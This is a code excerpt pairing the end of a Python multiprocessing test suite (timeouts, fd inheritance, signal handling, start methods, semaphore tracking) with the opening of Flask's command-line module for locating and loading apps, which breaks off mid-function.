@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json, subprocess
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['fork', 'spawn', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestSemaphoreTracker(unittest.TestCase):
def test_semaphore_tracker(self):
#
# Check that killing process does not leak named semaphores
#
import subprocess
cmd = '''if 1:
import multiprocessing as mp, time, os
mp.set_start_method("spawn")
lock1 = mp.Lock()
lock2 = mp.Lock()
os.write(%d, lock1._semlock.name.encode("ascii") + b"\\n")
os.write(%d, lock2._semlock.name.encode("ascii") + b"\\n")
time.sleep(10)
'''
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd % (w, w)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_multiprocessing.sem_unlink(name1)
p.terminate()
p.wait()
time.sleep(2.0)
with self.assertRaises(OSError) as ctx:
_multiprocessing.sem_unlink(name2)
# docs say it should be ENOENT, but OSX seems to give EINVAL
self.assertIn(ctx.exception.errno, (errno.ENOENT, errno.EINVAL))
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = 'semaphore_tracker: There appear to be 2 leaked semaphores'
self.assertRegex(err, expected)
self.assertRegex(err, r'semaphore_tracker: %r: \[Errno' % name1)
def check_semaphore_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.semaphore_tracker import _semaphore_tracker
_semaphore_tracker.ensure_running()
pid = _semaphore_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with contextlib.ExitStack() as stack:
if should_die:
stack.enter_context(self.assertWarnsRegex(
UserWarning,
"semaphore_tracker: process died"))
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
def test_semaphore_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_semaphore_tracker_death(signal.SIGINT, False)
def test_semaphore_tracker_sigkill(self):
# Uncatchable signal.
self.check_semaphore_tracker_death(signal.SIGKILL, True)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
print("Warning -- multiprocessing.Manager still has %s active "
"children after %s seconds"
% (multiprocessing.active_children(), dt),
file=sys.stderr)
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
print('Warning -- Shared objects which still exist at manager '
'shutdown:')
print(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.process._cleanup()
test.support.gc_collect()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
cli.py
|
import ast
import inspect
import os
import platform
import re
import sys
import traceback
import warnings
from functools import update_wrapper
from operator import attrgetter
from threading import Lock
from threading import Thread
import click
from werkzeug.utils import import_string
from .globals import current_app
from .helpers import get_debug_flag
from .helpers import get_env
from .helpers import get_load_dotenv
try:
import dotenv
except ImportError:
dotenv = None
try:
import ssl
except ImportError:
ssl = None # type: ignore
class NoAppException(click.UsageError):
"""Raised if an application cannot be found or loaded."""
def find_best_app(script_info, module):
"""Given a module instance this tries to find the best possible
application in the module or raises an exception.
"""
from . import Flask
# Search for the most common names first.
for attr_name in ("app", "application"):
app = getattr(module, attr_name, None)
if isinstance(app, Flask):
return app
# Otherwise find the only object that is a Flask instance.
matches = [v for v in module.__dict__.values() if isinstance(v, Flask)]
if len(matches) == 1:
return matches[0]
elif len(matches) > 1:
raise NoAppException(
"Detected multiple Flask applications in module"
f" {module.__name__!r}. Use 'FLASK_APP={module.__name__}:name'"
f" to specify the correct one."
)
# Search for app factory functions.
for attr_name in ("create_app", "make_app"):
app_factory = getattr(module, attr_name, None)
if inspect.isfunction(app_factory):
try:
app = call_factory(script_info, app_factory)
if isinstance(app, Flask):
return app
except TypeError:
if not _called_with_wrong_args(app_factory):
raise
raise NoAppException(
f"Detected factory {attr_name!r} in module {module.__name__!r},"
" but could not call it without arguments. Use"
f" \"FLASK_APP='{module.__name__}:{attr_name}(args)'\""
" to specify arguments."
)
raise NoAppException(
"Failed to find Flask application or factory in module"
f" {module.__name__!r}. Use 'FLASK_APP={module.__name__}:name'"
" to specify one."
)
def call_factory(script_info, app_factory, args=None, kwargs=None):
"""Takes an app factory, a ``script_info` object and optionally a tuple
of arguments. Checks for the existence of a script_info argument and calls
the app_factory depending on that and the arguments provided.
"""
sig = inspect.signature(app_factory)
args = [] if args is None else args
kwargs = {} if kwargs is None else kwargs
if "script_info" in sig.parameters:
warnings.warn(
"The 'script_info' argument is deprecated and will not be"
" passed to the app factory function in Flask 2.1.",
DeprecationWarning,
)
kwargs["script_info"] = script_info
if (
not args
and len(sig.parameters) == 1
and next(iter(sig.parameters.values())).default is inspect.Parameter.empty
):
warnings.warn(
"Script info is deprecated and will not be passed as the"
" single argument to the app factory function in Flask"
" 2.1.",
DeprecationWarning,
)
args.append(script_info)
return app_factory(*args, **kwargs)
def _called_with_wrong_args(f):
"""Check whether calling a function raised a ``TypeError`` because
the call failed or because something in the factory raised the
error.
:param f: The function that was called.
:return: ``True`` if the call failed.
"""
tb = sys.exc_info()[2]
try:
while tb is not None:
if tb.tb_frame.f_code is f.__code__:
# In the function, it was called successfully.
return False
tb = tb.tb_next
# Didn't reach the function.
return True
finally:
# Delete tb to break a circular reference.
# https://docs.python.org/2/library/sys.html#sys.exc_info
del tb
def find_app_by_string(script_info, module, app_name):
"""Check if the given string is a variable name or a function. Call
a function to get the app instance, or return the variable directly.
"""
from . import Flask
# Parse app_name as a single expression to determine if it's a valid
# attribute name or function call.
try:
expr = ast.parse(app_name.strip(), mode="eval").body
except SyntaxError:
raise NoAppException(
f"Failed to parse {app_name!r} as an attribute name or function call."
)
if isinstance(expr, ast.Name):
name = expr.id
args = kwargs = None
elif isinstance(expr, ast.Call):
# Ensure the function name is an attribute name only.
if not isinstance(expr.func, ast.Name):
raise NoAppException(
f"Function reference must be a simple name: {app_name!r}."
)
name = expr.func.id
# Parse the positional and keyword arguments as literals.
try:
args = [ast.literal_eval(arg) for arg in expr.args]
kwargs = {kw.arg: ast.literal_eval(kw.value) for kw in expr.keywords}
except ValueError:
# literal_eval gives cryptic error messages, show a generic
# message with the full expression instead.
raise NoAppException(
f"Failed to parse arguments as literal values: {app_name!r}."
)
else:
raise NoAppException(
f"Failed to parse {app_name!r} as an attribute name or function call."
)
try:
attr = getattr(module, name)
except AttributeError:
raise NoAppException(
f"Failed to find attribute {name!r} in {module.__name__!r}."
)
# If the attribute is a function, call it with any args and kwargs
# to get the real application.
if inspect.isfunction(attr):
try:
app = call_factory(script_info, attr, args, kwargs)
except TypeError:
if not _called_with_wrong_args(attr):
raise
raise NoAppException(
f"The factory {app_name!r} in module"
f" {module.__name__!r} could not be called with the"
" specified arguments."
)
else:
app = attr
if isinstance(app, Flask):
return app
raise NoAppException(
"A valid Flask application was not obtained from"
f" '{module.__name__}:{app_name}'."
)
def prepare_import(path):
"""Given a filename this will try to calculate the python path, add it
to the search path and return the actual module name that is expected.
"""
path = os.path.realpath(path)
fname, ext = os.path.splitext(path)
if ext == ".py":
path = fname
if os.path.basename(path) == "__init__":
path = os.path.dirname(path)
module_name = []
# move up until outside package structure (no __init__.py)
while True:
path, name = os.path.split(path)
module_name.append(name)
if not os.path.exists(os.path.join(path, "__init__.py")):
break
if sys.path[0] != path:
sys.path.insert(0, path)
return ".".join(module_name[::-1])
def locate_app(script_info, module_name, app_name, raise_if_not_found=True):
__traceback_hide__ = True # noqa: F841
try:
__import__(module_name)
except ImportError:
# Reraise the ImportError if it occurred within the imported module.
# Determine this by checking whether the trace has a depth > 1.
if sys.exc_info()[2].tb_next:
raise NoAppException(
f"While importing {module_name!r}, an ImportError was"
f" raised:\n\n{traceback.format_exc()}"
)
elif raise_if_not_found:
raise NoAppException(f"Could not import {module_name!r}.")
else:
return
module = sys.modules[module_name]
if app_name is None:
return find_best_app(script_info, module)
else:
return find_app_by_string(script_info, module, app_name)
def get_version(ctx, param, value):
if not value or ctx.resilient_parsing:
return
import werkzeug
from . import __version__
click.echo(
f"Python {platform.python_version()}\n"
f"Flask {__version__}\n"
f"Werkzeug {werkzeug.__version__}",
color=ctx.color,
)
ctx.exit()
version_option = click.Option(
["--version"],
help="Show the flask version",
expose_value=False,
callback=get_version,
is_flag=True,
is_eager=True,
)
class DispatchingApp:
"""Special application that dispatches to a Flask application which
is imported by name in a background thread. If an error happens
it is recorded and shown as part of the WSGI handling which in case
of the Werkzeug debugger means that it shows up in the browser.
"""
def __init__(self, loader, use_eager_loading=None):
self.loader = loader
self._app = None
self._lock = Lock()
self._bg_loading_exc_info = None
if use_eager_loading is None:
use_eager_loading = os.environ.get("WERKZEUG_RUN_MAIN") != "true"
if use_eager_loading:
self._load_unlocked()
else:
self._load_in_background()
def _load_in_background(self):
def _load_app():
__traceback_hide__ = True # noqa: F841
with self._lock:
try:
self._load_unlocked()
except Exception:
self._bg_loading_exc_info = sys.exc_info()
t = Thread(target=_load_app, args=())
t.start()
def _flush_bg_loading_exception(self):
__traceback_hide__ = True # noqa: F841
exc_info = self._bg_loading_exc_info
if exc_info is not None:
self._bg_loading_exc_info = None
raise exc_info
def _load_unlocked(self):
__traceback_hide__ = True # noqa: F841
self._app = rv = self.loader()
self._bg_loading_exc_info = None
return rv
def __call__(self, environ, start_response):
__traceback_hide__ = True # noqa: F841
if self._app is not None:
return self._app(environ, start_response)
self._flush_bg_loading_exception()
with self._lock:
if self._app is not None:
rv = self._app
else:
rv = self._load_unlocked()
return rv(environ, start_response)
class ScriptInfo:
"""Helper object to deal with Flask applications. This is usually not
necessary to interface with as it's used internally in the dispatching
to click. In future versions of Flask this object will most likely play
a bigger role. Typically it's created automatically by the
:class:`FlaskGroup` but you can also manually create it and pass it
onwards as click object.
"""
def __init__(self, app_import_path=None, create_app=None, set_debug_flag=True):
#: Optionally the import path for the Flask application.
self.app_import_path = app_import_path or os.environ.get("FLASK_APP")
#: Optionally a function that is passed the script info to create
#: the instance of the application.
self.create_app = create_app
#: A dictionary with arbitrary data that can be associated with
#: this script info.
self.data = {}
self.set_debug_flag = set_debug_flag
self._loaded_app = None
def load_app(self):
"""Loads the Flask app (if not yet loaded) and returns it. Calling
this multiple times will just result in the already loaded app to
be returned.
"""
__traceback_hide__ = True # noqa: F841
if self._loaded_app is not None:
return self._loaded_app
if self.create_app is not None:
app = call_factory(self, self.create_app)
else:
if self.app_import_path:
path, name = (
re.split(r":(?![\\/])", self.app_import_path, 1) + [None]
)[:2]
import_name = prepare_import(path)
app = locate_app(self, import_name, name)
else:
for path in ("wsgi.py", "app.py"):
import_name = prepare_import(path)
app = locate_app(self, import_name, None, raise_if_not_found=False)
if app:
break
if not app:
raise NoAppException(
"Could not locate a Flask application. You did not provide "
'the "FLASK_APP" environment variable, and a "wsgi.py" or '
'"app.py" module was not found in the current directory.'
)
if self.set_debug_flag:
# Update the app's debug flag through the descriptor so that
# other values repopulate as well.
app.debug = get_debug_flag()
self._loaded_app = app
return app
pass_script_info = click.make_pass_decorator(ScriptInfo, ensure=True)
def with_appcontext(f):
"""Wraps a callback so that it's guaranteed to be executed with the
script's application context. If callbacks are registered directly
to the ``app.cli`` object then they are wrapped with this function
by default unless it's disabled.
"""
@click.pass_context
def decorator(__ctx, *args, **kwargs):
with __ctx.ensure_object(ScriptInfo).load_app().app_context():
return __ctx.invoke(f, *args, **kwargs)
return update_wrapper(decorator, f)
class AppGroup(click.Group):
"""This works similar to a regular click :class:`~click.Group` but it
changes the behavior of the :meth:`command` decorator so that it
automatically wraps the functions in :func:`with_appcontext`.
Not to be confused with :class:`FlaskGroup`.
"""
def command(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it wraps callbacks in :func:`with_appcontext`
unless it's disabled by passing ``with_appcontext=False``.
"""
wrap_for_ctx = kwargs.pop("with_appcontext", True)
def decorator(f):
if wrap_for_ctx:
f = with_appcontext(f)
return click.Group.command(self, *args, **kwargs)(f)
return decorator
def group(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it defaults the group class to
:class:`AppGroup`.
"""
kwargs.setdefault("cls", AppGroup)
return click.Group.group(self, *args, **kwargs)
class FlaskGroup(AppGroup):
"""Special subclass of the :class:`AppGroup` group that supports
loading more commands from the configured Flask app. Normally a
developer does not have to interface with this class but there are
some very advanced use cases for which it makes sense to create an
instance of this. see :ref:`custom-scripts`.
:param add_default_commands: if this is True then the default run and
shell commands will be added.
:param add_version_option: adds the ``--version`` option.
:param create_app: an optional callback that is passed the script info and
returns the loaded app.
:param load_dotenv: Load the nearest :file:`.env` and :file:`.flaskenv`
files to set environment variables. Will also change the working
directory to the directory containing the first file found.
:param set_debug_flag: Set the app's debug flag based on the active
environment
.. versionchanged:: 1.0
If installed, python-dotenv will be used to load environment variables
from :file:`.env` and :file:`.flaskenv` files.
"""
def __init__(
self,
add_default_commands=True,
create_app=None,
add_version_option=True,
load_dotenv=True,
set_debug_flag=True,
**extra,
):
params = list(extra.pop("params", None) or ())
if add_version_option:
params.append(version_option)
AppGroup.__init__(self, params=params, **extra)
self.create_app = create_app
self.load_dotenv = load_dotenv
self.set_debug_flag = set_debug_flag
if add_default_commands:
self.add_command(run_command)
self.add_command(shell_command)
self.add_command(routes_command)
self._loaded_plugin_commands = False
def _load_plugin_commands(self):
if self._loaded_plugin_commands:
return
try:
import pkg_resources
except ImportError:
self._loaded_plugin_commands = True
return
for ep in pkg_resources.iter_entry_points("flask.commands"):
self.add_command(ep.load(), ep.name)
self._loaded_plugin_commands = True
def get_command(self, ctx, name):
self._load_plugin_commands()
# Look up built-in and plugin commands, which should be
# available even if the app fails to load.
rv = super().get_command(ctx, name)
if rv is not None:
return rv
info = ctx.ensure_object(ScriptInfo)
# Look up commands provided by the app, showing an error and
# continuing if the app couldn't be loaded.
try:
return info.load_app().cli.get_command(ctx, name)
except NoAppException as e:
click.secho(f"Error: {e.format_message()}\n", err=True, fg="red")
def list_commands(self, ctx):
self._load_plugin_commands()
# Start with the built-in and plugin commands.
rv = set(super().list_commands(ctx))
info = ctx.ensure_object(ScriptInfo)
# Add commands provided by the app, showing an error and
# continuing if the app couldn't be loaded.
try:
rv.update(info.load_app().cli.list_commands(ctx))
except NoAppException as e:
# When an app couldn't be loaded, show the error message
# without the traceback.
click.secho(f"Error: {e.format_message()}\n", err=True, fg="red")
except Exception:
# When any other errors occurred during loading, show the
# full traceback.
click.secho(f"{traceback.format_exc()}\n", err=True, fg="red")
return sorted(rv)
def main(self, *args, **kwargs):
# Set a global flag that indicates that we were invoked from the
# command line interface. This is detected by Flask.run to make the
# call into a no-op. This is necessary to avoid ugly errors when the
# script that is loaded here also attempts to start a server.
os.environ["FLASK_RUN_FROM_CLI"] = "true"
if get_load_dotenv(self.load_dotenv):
load_dotenv()
obj = kwargs.get("obj")
if obj is None:
obj = ScriptInfo(
